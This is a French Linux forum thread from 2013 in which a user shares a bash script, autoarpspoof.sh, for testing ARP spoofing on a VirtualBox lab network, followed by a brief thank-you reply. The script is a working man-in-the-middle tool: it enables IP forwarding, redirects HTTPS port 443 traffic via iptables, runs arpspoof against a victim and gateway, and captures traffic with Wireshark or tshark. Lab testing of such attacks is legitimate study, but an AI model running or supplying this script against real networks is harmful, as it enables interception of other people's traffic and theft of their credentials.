user@linuxtrack:~ $ python -c 'print("Soyez les bienvenus !")'

Vous n'êtes pas identifié(e).

#1 06-07-2013 08:03:57

IceF0x
#! Gourou Linux

autoarpspoof.sh pour tester le spoofing arp sur un réseau virtuel.

Suite à un post sur backtrack-fr (malheureusement plus disponible) je poste la modification du script initial qui permet de tester l'arp spoofing sur un réseau virtuel créé à l'aide de virtualbox

Le réseau virtuel est en mode bridge la machine attaquante à l'IP 192.168.1.11 et utilise arpspoof et wireshark  et la machine victime l'IP 192.168.1.12

#!/bin/bash

red='\e[0;31m'
NC='\e[0m'

if [ `whoami` != root ]
then
echo -e "$red Error:$NC Vous devez être root pour pouvoir exécuter ce script !"
exit 1
fi

if [[ `cat /proc/sys/net/ipv4/ip_forward` == "0" ]]
then 
echo 1 > /proc/sys/net/ipv4/ip_forward
fi

interface=$(/usr/bin/ip route show | awk '(NR == 2) {print $3}')

ipbox=$(/usr/bin/ip route show | awk '(NR == 1) {print $3}')

read -p "Écrivez l'ip de la victime: " ipvictime

if ping -c 1 $ipvictime | grep "Unreachable" > /dev/null 2>&1
then 
echo -e "$red Error:$NC La victime est injoignable"
exit
else 
echo "La victime est connectée"
fi

iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 10000
iptables -A FORWARD -j ACCEPT

xterm -e arpspoof -i $interface -t $ipvictime $ipbox &
xterm -e arpspoof -i $interface -t $ipbox $ipvictime &

wireshark -i $interface -k

echo "presser une touche pour remettre à 0 l'ip forwarding"
read reset
echo 0 > /proc/sys/net/ipv4/ip_forward

Attaquant

1373090334.png

Victime

1373090453.png

On remarque tout de même que lors d'un ping le spoofing arp est détecté.

wireshark -i $interface -k 

Peut aussi être remplacé par

read outputfile 
tshark $interface -w $outputfile.cap

== Voir aussi ==

** (fr) * http://fr.wikipedia.org/wiki/Address_Re … n_Protocol


Utiliser des logiciels propriétaires, c'est comme les plats préparés, on est incapable de dire les conservateurs qu'ils contiennent, on dira toujours que c'est bon, mais ça ne remplacera jamais le repas fait maison par sa maman.
]:D #! Crunchbang & Archlinux GNU/Linux User ]:D

Hors ligne

#2 07-07-2013 19:19:27

Yzeew
Membre d'or

Re : autoarpspoof.sh pour tester le spoofing arp sur un réseau virtuel.

merci pour le script .


>> Good things come to those who, Wait.. <<

>> sip:yzeew@ekiga.net << and >> #Pouni3 <<

Hors ligne

Pied de page des forums